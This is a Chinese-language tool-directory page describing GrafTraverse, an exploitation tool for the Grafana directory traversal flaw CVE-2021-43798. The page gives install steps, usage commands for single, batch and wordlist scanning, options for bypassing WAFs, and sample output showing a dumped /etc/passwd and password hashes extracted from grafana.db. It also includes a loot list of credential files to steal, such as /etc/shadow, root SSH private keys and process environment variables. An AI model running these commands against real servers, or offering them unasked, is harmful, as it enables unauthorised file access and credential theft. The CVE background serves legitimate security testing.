Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
GrafTraverse-CVE-2021-43798 — CVE-2021-43798 MiNi Exploitation Framework | Kitploit
工具/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
密码破解漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试红队
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Exploitation Framework

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GrafTraverse - CVE-2021-43798 迷你利用框架

用于授权安全测试 Grafana 目录遍历漏洞(CVE-2021-43798)的命令行自动化工具。


概述

Banner

CVE-2021-43798 是 Grafana 8.x 中存在的一个未认证目录遍历漏洞,攻击者可以通过 /public/plugins/ 端点读取底层文件系统中的任意文件。根本原因在于对插件资产请求的路径清理不当,导致 ../ 序列能够逃逸出预期目录。

GrafTraverse 是对原始概念验证代码的完全重写。它修复了关键的请求处理错误,增加了多线程批量扫描、自动插件发现、凭据提取和结构化报告功能——使其成为红队和渗透测试人员的生产级工具。


功能

功能描述
多插件暴力破解自动探测 40+ 内置插件以找到易受攻击的路径
交互模式菜单驱动的单目标利用,支持实时文件预览
批量模式并发多目标扫描,支持可配置的工作线程数
字典模式使用自定义字典进行深度文件枚举
自动哈希提取从下载的 grafana.db 中自动提取 PBKDF2 密码哈希
结构化日志将结果导出为 JSON 和 CSV,便于无缝报告
代理支持通过 Burp、ZAP 或任何 HTTP 代理路由流量(--proxy)
自定义请求头注入任意请求头以绕过 WAF 或添加认证令牌(-H)
遍历深度自定义为非标准环境覆盖默认遍历深度(--depth)
智能过滤通过拒绝插件 JS/CSS/HTML 响应来消除误报
零依赖仅需 requests(Kali / Parrot 中已预装)

安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# 确保已安装 requests(Kali 自带)
pip3 install requests

# 添加可执行权限
chmod +x GrafTraverse.py

用法

GrafTraverse 使用 子命令式 CLI。所有命令均支持 --help。

1. 交互式单目标

对单个主机启动交互菜单:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 交互模式
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. 自定义路径
 5. 全自动战利品收集
 6. 扫描插件
 7. 退出
============================================================

2. 插件扫描

快速识别哪个插件端点存在漏洞(不进行利用):

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. 批量扫描

从文件加载目标并并发处理:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

targets.txt 格式:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# 以 # 开头的行将被忽略

4. 字典枚举

传入自定义文件列表进行深度遍历:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. 代理与自定义请求头

通过 Burp Suite 路由并添加自定义请求头:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

命令参考

single

batch

标志描述
-l, --list包含目标 URL 的文件(必填)
--workers并发线程数(默认:5)
(支持所有 single 标志)

scan

标志描述
-u, --url目标 URL(必填)
(支持所有网络标志)

示例输出

成功获取文件

root@kitploit:~
[+] 输出目录: 20260526_GrafTraverse
[*] 测试: /etc/passwd (通过 alertlist 插件)
[+] 成功: /etc/passwd (1874 字节)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] 已保存: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Grafana 数据库哈希提取

root@kitploit:~
[*] 测试: /var/lib/grafana/grafana.db (通过 alertlist 插件)
[+] 成功: /var/lib/grafana/grafana.db (98304 字节)
[+] 已保存: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] 提取到 3 个密码哈希:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

目标文件(自动战利品收集)

内置战利品收集序列会按顺序尝试获取以下文件:


受影响版本

  • Grafana 8.0.0 至 8.3.0
  • 已在 8.3.1 和 7.5.12 中修复
下载工具
标志描述
-u, --url目标 URL(必填)
--no-download仅查看模式,不保存文件
-t, --timeout请求超时时间(秒,默认:10)
--proxyHTTP/HTTPS 代理 URL
-H, --header自定义请求头(可重复)
--depth遍历字符串(默认:../../../../../../../../)
--output-dir保存检索文件的目录
--json将结果追加到 JSON 日志文件
--csv将结果追加到 CSV 日志文件
--wordlist包含要枚举的路径的文件
--plugin强制指定特定插件名称
文件类型敏感程度
/etc/passwd文本用户枚举
/etc/shadow文本密码哈希(通常不可读)
/etc/hosts文本网络拓扑
/etc/hostname文本主机识别
/etc/grafana/grafana.ini文本Grafana 密钥和数据库凭据
/var/lib/grafana/grafana.db二进制包含用户哈希和 API 密钥的 SQLite 数据库
/var/log/grafana/grafana.log文本运行信息
/root/.ssh/id_rsa文本SSH 私钥
/root/.ssh/authorized_keys文本基于密钥的访问映射
/proc/self/environ文本进程环境变量
/proc/self/cmdline文本进程参数
/proc/version文本内核版本
/proc/mounts文本文件系统布局
/etc/os-release文本操作系统识别
/etc/issue文本操作系统识别
/etc/crontab文本计划任务
/etc/resolv.conf文本DNS 配置